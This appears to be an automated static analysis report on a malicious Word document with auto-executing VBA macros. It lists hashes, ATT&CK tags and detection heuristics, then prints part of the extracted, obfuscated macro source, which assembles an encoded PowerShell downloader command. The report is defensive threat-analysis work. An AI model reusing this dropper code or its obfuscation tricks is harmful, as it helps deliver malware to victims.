Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9b8113083f7b11c…

MALICIOUS

Office (OLE)

Size: 86.0 KB
Created: 2018-06-15 19:27:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: bb4c76ee8ac2cb0e41711083605e1dda
SHA-1: 9e5a82850f76bfda1c25f555c4d8765962d57d12
SHA-256: f9b8113083f7b11c91c1dce9bfdc64f50712d38ae24cc18fbda90182ca15c00b
Risk score: 62

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic

The sample is an Office document with VBA macros. A high-severity heuristic indicates that these macros execute a shell command via the Document_open auto-execution function. This strongly suggests the document is designed to download and execute a secondary payload, a common technique for malware delivery.

Heuristics (3)

  • VBA macros detected (severity: medium, 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9861 bytes
SHA-256: 5294f1abac39f197298c8c4a3d231cca85bf9f2ccd620f0f892f59d35a108739
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
Aq
Attribute VB_Name = "VloMmGSp"
Function QomLwriF()
On Error Resume Next
mBZlT = kTVSkh
AKLmTG = Rnd(pRsSSX)
vvkpLh = (33978 * Sgn(jEpVuO) / 94722 / lZvld * PThwz + ChrW(VsOJoL) / HWkBqD * CInt(FwjPZM))
oNjuW = 90714 + CHZNYV
SBiEVB = "HeLL  . (" + " $" + "env:coMSPEC[" + "4,26," + "25]-jOIN" + "'') (" + "-jOiN(" + "'9" + "7V63<"
TjSZlv = IVTsF
QjspwG = Rnd(fQHMji)
bFdoHU = (47014 * Sgn(FEhqc) / 94491 / iVlOGt * honwn + ChrW(fVLpdw) / aXiwN * CInt(fNfkiI))
nqfhi = 68041 + jBXEhz
MqqQjTV = "28r39~11~3" + "9N101{120" + "V101{43V32N50" + "~104N42V39" + "{47~" + "32{3" + "8r49r101~55N"
wCEEp = dEVdLi
VaAidz = Rnd(OYoBJh)
ABihn = (61647 * Sgn(tcnrU) / 53738 / MPNtc * iPWkw + ChrW(suhPO) / jchHbE * CInt(UcUWO))
mkssN = 62394 + JKmoBf
WUQUf = "36s43r33~" + "42G40{12" + "6J97V7<7x2" + "9<50{17N101G1" + "20~101N43<3"
IsHrKt = XMFTd
kNYRp = Rnd(jiKYk)
IiwZEw = (53740 * Sgn(ThhVJJ) / 81189 / wOpNB * rbTOrY + ChrW(YOUiTE) / MMumcK * CInt(LaVAkR))
wkTnHL = 25289 + KlwiE
hIhjV = "2J" + "50x104" + "N42s3" + "9V47N32s3" + "8V4" + "9J101" + "r22s6"
QomLwriF = SBiEVB + MqqQjTV + WUQUf + hIhjV
End Function
Function jKuBhYc()
On Error Resume Next
rJjAzN = HEKXq
NqdQq = Rnd(nWGpF)
duGqF = (9492 * Sgn(ZHtsNi) / 20163 / UiaWZf * AHWIbw + ChrW(wkvVdN) / pwjPW * CInt(jPomS))
CvSMr = 81006 + womUD
zwvMY = "0V54~49~" + "32" + "V40" + "s107V11G32V4" + "9x107" + "V1" + "8V32r39r6{41G44" + "{32s43G49~126s9"
DUOlT = pYXJcA
amVkB = Rnd(hiuzU)
EviPqi = (68455 * Sgn(niaGru) / 33448 / EHmpt * NPIjk + ChrW(ELUjI) / nFOHo * CInt(KVQmn))
djdJJw = 85213 + zWiju
ipqBj = "7r53~47x7r" + "14V4" + "0G1" + "01s120<101~98" + "N45V49G49{53"
fYzaci = vimtS
boYSSB = Rnd(KAriSG)
wCwXwA = (57209 * Sgn(iooYt) / 62513 / iNaVhJ * btHqcG + ChrW(tuiuEz) / KnvwqU * CInt(kJCizR))
tchbN = 88998 + oGLrzT
wtdncVXj = "V127r106" + "x106G50G50G50r" + "107" + "N36N43" + "x36s41r60" + "s49x44r38{54" + "G1" + "07V49x45" + "r32~" + "40x44G4"
hrkEHi = kYiLJX
VMXlj = Rnd(aCQFY)
MHWpXS = (10842 * Sgn(qDYtR) / 32608 / wjwuql * SLwuii + ChrW(LuURz) / QCqBYj * CInt(AhjOM))
OotFd = 79558 + AXZfZr
dYatnNQ = "3r32s55J5" + "4r48G43x44~42V" + "43s107" + "s38J42s40x106r" + "38G18J11" + "2G61s22s40s1" + "06{5J45r"
ikfjh = jnJiF
ucCMO = Rnd(vdpLrd)
DKarzY = (79558 * Sgn(jVZbm) / 89984 / ViMQta * vFfHvY + ChrW(EVazqO) / wCqYj * CInt(jMLEzn))
bsiIEb = 34384 + ZtpwVG
sJwmd = "49N49J53<127" + "s106V10" + "6G36<
... (truncated)